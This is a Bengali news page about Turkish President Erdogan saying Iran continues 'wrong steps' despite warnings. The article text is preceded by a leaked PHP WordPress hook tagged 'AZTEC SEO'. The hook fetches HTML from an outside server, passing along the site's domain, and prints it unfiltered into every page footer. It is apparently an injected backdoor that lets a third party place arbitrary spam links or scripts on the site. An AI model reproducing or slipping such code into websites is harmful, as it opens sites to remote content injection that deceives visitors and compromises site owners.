/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); সতর্ক করার পরও ইরান ‘ভুল করছে’: এরদোগান | Dhaka Sky News

পার্বত্য চট্টগ্রামে ১০৯৭ পরিবার পেল ফ্যামিলি কার্ড

আগের সংবাদ

নারী ক্ষমতায়নের অংশ হিসেবে চালু হলো ‘ফ্যামিলি কার্ড’: প্রধানমন্ত্রী

পরের সংবাদ

সতর্ক করার পরও ইরান ‘ভুল করছে’: এরদোগান

আন্তর্জাতিক ডেস্ক

প্রকাশিত: March 10, 2026 , 3:50 pm

তুরস্কের প্রেসিডেন্ট রিসেপ তাইয়েপ এরদোগান বলেছেন, প্রয়োজনীয় সতর্কবার্তা দেওয়া হলেও ইরান এখনো ‘ভুল পদক্ষেপ’ নিয়ে যাচ্ছে। তবে তুরস্কের প্রধান লক্ষ্য হলো নিজেকে এই সংঘাতে জড়িয়ে পড়া থেকে দূরে রাখা।
সোমবার (৯ মার্চ) মন্ত্রিসভার বৈঠকের পর এক সংবাদ সম্মেলনে এরদোগান বলেন, ইরানকে ঘিরে চলমান পরিস্থিতি তুরস্ক ঘনিষ্ঠভাবে পর্যবেক্ষণ করছে এবং তাদের উদ্বেগ সরাসরি তেহরানের কাছে জানানো হয়েছে।
তিনি বলেন, ‘ইরানকে প্রয়োজনীয় সতর্কবার্তা দেওয়া হয়েছে। কিন্তু সেই সতর্কবার্তার পরও তারা ভুল পদক্ষেপ নিতে থাকছে।’
এরদোগান আবারো জোর দিয়ে বলেন, তুরস্কের প্রধান লক্ষ্য হলো দেশটিকে এই যুদ্ধ থেকে দূরে রাখা এবং একই সঙ্গে কূটনৈতিক সমাধানের পক্ষে অবস্থান নেওয়া।
তিনি বলেন, ‘অন্য যুদ্ধগুলোর মতোই তুরস্ক ন্যায়ের পক্ষে দাঁড়ায় এবং সংলাপের মাধ্যমে সংঘাতের সমাধানকে সমর্থন করে।’